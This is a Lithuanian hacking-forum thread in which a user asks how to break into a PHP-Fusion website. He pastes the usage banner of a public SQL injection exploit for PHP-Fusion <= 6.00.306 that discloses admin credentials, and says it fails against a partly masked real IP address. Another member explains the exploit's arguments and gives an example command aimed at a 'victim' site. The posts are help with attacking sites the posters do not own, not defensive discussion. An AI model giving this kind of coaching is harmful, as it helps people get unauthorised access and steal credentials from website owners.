Gal kas yra lauze php-fusion kurta pusplapi?
Neapasidalinsite patirtim...?
http://securitydot.net/xpl/exploits/vul ... ploit.html
Reik isnaudoti sy expoita bet perl spjaudos...
php-fusion
linux + nessus + nmap + exploit +enter = all doors open
Re: php-fusion
Gal geriau tu net nesidomėk daugiau hakeriavimu jei net nematai kad tai ne perl o php exploitasXgreem rašė:Gal kas yra lauze php-fusion kurta pusplapi?
Neapasidalinsite patirtim...?
http://securitydot.net/xpl/exploits/vul ... ploit.html
Reik isnaudoti sy expoita bet perl spjaudos...
I am not hacker, i am onli Mr.47
Re: php-fusion
Gal pamokysi nevykelius, kaip php exploitą paleisti? ;]Mr.47 rašė:Gal geriau tu net nesidomėk daugiau hakeriavimu jei net nematai kad tai ne perl o php exploitasXgreem rašė:Gal kas yra lauze php-fusion kurta pusplapi?
Neapasidalinsite patirtim...?
http://securitydot.net/xpl/exploits/vul ... ploit.html
Reik isnaudoti sy expoita bet perl spjaudos...
Uj labai atsiprasau,uzmeciau skubomis aky y /usr/bin ir iskart y galva sove kad perl bus...
hm...tieisog labai skubejau
Bet neesme ar su perl ji leidi ar su php reguoja panasiai nu neesme
[voodoo@localhost]# perl ex.pl
php php.pl
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/php/msql.so' - /usr/lib/php/extensions/php/msql.so: cannot open shared object file: No such file or directory in Unknown on line 0
Could not open input file: php.pl
[voodoo@localhost ~]$ php ex.pl
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/php/msql.so' - /usr/lib/php/extensions/php/msql.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP-Fusion <= v6.00.306 "srch_where" SQL
Injection/Admin credentials disclosure
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
Usage: php ex.pl host path user pass
OPTIONS
host: target server (ip/hostname)
path: path to PHP-Fusion
user/pass: you need an account
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php ex.pl localhost /fusion/ username
password
cja biski pas mane ksk ne taip..bet turetu exploitas veikt
ant windows spjaudos klaidom cja kjp ir gerai bet dabar kaip suprantu reikia prisiregint prie to saito jo? ir rasyti savo username ir pass.?
Ir kas per path ? galit paaiskint?
Tipo turetu but php exploit.pl (ip) (path?) -p 80 (loginname mano) (pass) ? nu man ant bajere padariau path /php-fusion/ tai v ka snek
step 1 -> login...
No response from 62.80.*.* be zvaigzduciu...any help?
hm...tieisog labai skubejau
Bet neesme ar su perl ji leidi ar su php reguoja panasiai nu neesme
[voodoo@localhost]# perl ex.pl
php php.pl
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/php/msql.so' - /usr/lib/php/extensions/php/msql.so: cannot open shared object file: No such file or directory in Unknown on line 0
Could not open input file: php.pl
[voodoo@localhost ~]$ php ex.pl
PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php/extensions/php/msql.so' - /usr/lib/php/extensions/php/msql.so: cannot open shared object file: No such file or directory in Unknown on line 0
PHP-Fusion <= v6.00.306 "srch_where" SQL
Injection/Admin credentials disclosure
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
Usage: php ex.pl host path user pass
OPTIONS
host: target server (ip/hostname)
path: path to PHP-Fusion
user/pass: you need an account
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php ex.pl localhost /fusion/ username
password
cja biski pas mane ksk ne taip..bet turetu exploitas veikt
ant windows spjaudos klaidom cja kjp ir gerai bet dabar kaip suprantu reikia prisiregint prie to saito jo? ir rasyti savo username ir pass.?
Ir kas per path ? galit paaiskint?
Tipo turetu but php exploit.pl (ip) (path?) -p 80 (loginname mano) (pass) ? nu man ant bajere padariau path /php-fusion/ tai v ka snek
step 1 -> login...
No response from 62.80.*.* be zvaigzduciu...any help?
linux + nessus + nmap + exploit +enter = all doors open
path tai direktoriaj kurioja yra tavo auka, nu tipo:
http://www.auka.lt/direktorija/news.php
Nu tai path bus direktorija ir dažniausei užrašomas tarp slash'u '/', pvz.: /direktorija/
jei direktorijos nėra tada dedam vietoj /direktorija/ tik /
O tūrėtu būti taip:
php exploit.pl http://www.auka.lt /direktorija/ 80 loginname pass
Nu gal lamiškai paaiškinau, bet manau supratai
http://www.auka.lt/direktorija/news.php
Nu tai path bus direktorija ir dažniausei užrašomas tarp slash'u '/', pvz.: /direktorija/
jei direktorijos nėra tada dedam vietoj /direktorija/ tik /
O tūrėtu būti taip:
php exploit.pl http://www.auka.lt /direktorija/ 80 loginname pass
Nu gal lamiškai paaiškinau, bet manau supratai
I am not hacker, i am onli Mr.47
Dabar prisijungę
Vartotojai naršantys šį forumą: 5 ir 0 svečių